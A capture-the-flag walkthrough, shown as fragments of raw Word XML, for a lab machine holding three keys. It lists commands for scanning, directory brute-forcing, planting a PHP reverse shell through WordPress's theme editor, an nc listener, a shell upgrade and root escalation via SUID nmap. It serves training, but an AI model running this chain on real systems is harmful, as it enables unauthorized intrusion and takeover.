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Scan target with nmap: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nmap -Pn &lt;IP&gt; -A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Found o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pen ports: 80 (HTTP), 443 (HTTPS), 22 (SSH)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Visit the website and inspect source code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robots.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file: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curl http://&lt;IP&gt;/robots.txt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Found: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key-1-of-3.txt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fsocity.dic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Retrieve first key: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curl http://&lt;IP&gt;/key-1-of-3.txt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Download dictionary file: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wget http://&lt;IP&gt;/fsocity.dic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Brute-force directories using discovered dictionary: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gobuster dir -u http://&lt;IP&gt; -w fsocity.dic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Found interesting file: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/license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Inspect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/license</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> source code: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view-source:http://&lt;IP&gt;/license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Found base64 encoded value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Decode base64 value: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"&lt;base64_string&gt;" | base64 -d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Revealed login credentials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 in using discovered credentials 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/login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Upload reverse shell from pentestmonkey via Appearance &gt; Editor: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Edit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header.php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Insert PHP reverse shell code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up listener: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nc -lvnp 3333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Trigger reverse shell by visiting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/blog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Upgrade shell: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python -c 'import pty; pty.spawn("/bin/bash")'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 files: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ls -la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Found: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key-2-of-3.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (readable only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robot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user)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Found: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password.raw-md5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Crack MD5 hash (use online tool like CrackStation)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Switch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robot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user: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 robot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Read second key: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cat key-2-of-3.txt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sudo permissions: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-l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Find SUID binaries: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find / -perm -u=s -type f 2&gt;/dev/null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Found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nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with SUID bit set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nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for root: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nmap --interactive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!sh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Retrieve final key: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cat /root/key-3-of-3.txt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